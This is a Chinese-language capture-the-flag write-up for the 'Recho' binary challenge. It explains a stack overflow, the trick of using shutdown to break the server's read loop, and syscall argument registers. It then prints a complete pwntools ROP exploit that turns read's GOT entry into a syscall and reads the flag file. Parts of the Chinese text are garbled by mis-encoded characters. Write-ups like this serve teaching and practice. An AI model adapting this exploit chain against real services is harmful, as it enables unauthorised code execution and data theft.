這道題到比賽結(jié)束時還是一臉懵逼,看了writeup才知道其實(shí)自己的思路已經(jīng)接近了悠砚,不過還是有一些需要注意的點(diǎn)晓勇。
看一下主程序吧:
int __cdecl main(int argc, const char **argv, const char **envp)
{
Init(*(_QWORD *)&argc, argv, envp);
write(1, "Welcome to Recho server!\n", 0x19uLL);
while ( read(0, &nptr, 0x10uLL) > 0 )
{
v7 = atoi(&nptr);
if ( v7 <= 15 )
v7 = 16;
v6 = read(0, buf, v7);
buf[v6] = 0;
printf("%s", buf);
}
return 0;
}
很明顯的棧溢出,但是有一個問題灌旧,這兒有一個死循環(huán):在不斷開連接的情況下read的返回值始終大于0(當(dāng)然绑咱,如果我們可以控制read的長度為一個比較大的值,比如0x2000枢泰,這個時候再傳入比較多的字符串描融,返回結(jié)果就可能為-1)
在當(dāng)前情況下,唯一退出死循環(huán)的方法就只有關(guān)閉socket的讀通道(對應(yīng)的衡蚂,在我們這端為寫通道)窿克。比賽的時候就只知道close這么個函數(shù),而一旦調(diào)用close毛甲,就沒有辦法再輸出數(shù)據(jù)了年叮。今天的看了writeup,發(fā)現(xiàn)還可以調(diào)用shutdown函數(shù)來單獨(dú)關(guān)閉讀或?qū)懖D迹幸馑肌?/p>
知道了思路后就是調(diào)試了只损,但如果調(diào)用shutdown函數(shù)來退出循環(huán),連接很快就會斷掉补箍,進(jìn)一步進(jìn)程就會被殺死改执,這對我們的調(diào)試是一個很大的障礙。解決辦法也比較簡單坑雅, patch掉產(chǎn)生循環(huán)的指令辈挂,把ROP調(diào)試成功后再去測試shutdown退出循環(huán)。
另外一個知識點(diǎn)是int 80裹粤,syscenter终蒂,syscall這幾種方式的傳參方法。int 80和syscenter采用的同樣的傳參順序:eax遥诉,ebx拇泣,ecx,edx矮锈。但是syscall的傳參順序居然變成了rdi霉翔,rsi,rdx苞笨,r10债朵,r9子眶,r8。之前一直認(rèn)為這三種方式采用的是同樣的傳參方式序芦。
好吧臭杰,問題基本就這些。下面是完整的利用腳本
#!/usr/bin/env python
# coding=utf-8
from pwn import *
import time
from socket import *
local = 0
debug = 0
slog = 0
context.log_level= "DEBUG"
context.arch = 'amd64'
def pwn():
p = remote('127.0.0.1', 4444)
elf = ELF('./Recho')
time.sleep(0.5)
#gdb.attach(pidof('recho')[0], open('debug'))
p.recvuntil('server!')
p.sendline('1000')
time.sleep(0.5)
'''
recho
0x4006fc : pop rax ; ret
0x4008a3 : pop rdi ; ret
0x4006fe : pop rdx ; ret
0x4008a1 : pop rsi ; pop r15 ; ret
0x40070c : xchg eax, ebx ; add byte ptr [rdi], al ; ret
'''
pop_rax = 0x4006fc
pop_rdi = 0x4008a3
pop_rdx = 0x4006fe
pop_rsi_r15 = 0x4008a1
xchg_add_rdi_eax = 0x40070c
bss_addr = 0x601000 + 0x100
payload = 'a'*0x38 # padding
# change read to syscall
payload += p64(pop_rax) + p64(0xe)
payload += p64(pop_rdi) + p64(elf.got['read'])
payload += p64(xchg_add_rdi_eax)
payload += p64(xchg_add_rdi_eax)
# fd = open('flag')
payload += p64(pop_rax) + p64(int(constants.SYS_open))
payload += p64(pop_rdi) + p64(elf.symbols['flag'])
payload += p64(pop_rsi_r15) + p64(0) + p64(0xdeadbeef)
payload += p64(pop_rdx) + p64(0) + p64(elf.plt['read'])
# read(fd, bss_addr, 100)
payload += p64(pop_rax) + p64(int(constants.SYS_read))
payload += p64(pop_rdi) + p64(5) # in my system kali 2.0, fd is 5
# in remote machine, it may not be this
# but won't be very large
payload += p64(pop_rsi_r15) + p64(bss_addr) + p64(0xdeadbeef)
payload += p64(pop_rdx) + p64(20)+ p64(elf.plt['read'])
# write(fd, bss_addr, 100)
payload += p64(pop_rax) + p64(int(constants.SYS_write))
payload += p64(pop_rdi) + p64(1)
payload += p64(pop_rsi_r15) + p64(bss_addr) + p64(0xdeadbeef)
payload += p64(pop_rdx) + p64(20)+ p64(elf.plt['read'])
p.sendline(payload)
p.shutdown("write")
p.interactive()
if __name__ == "__main__":
pwn()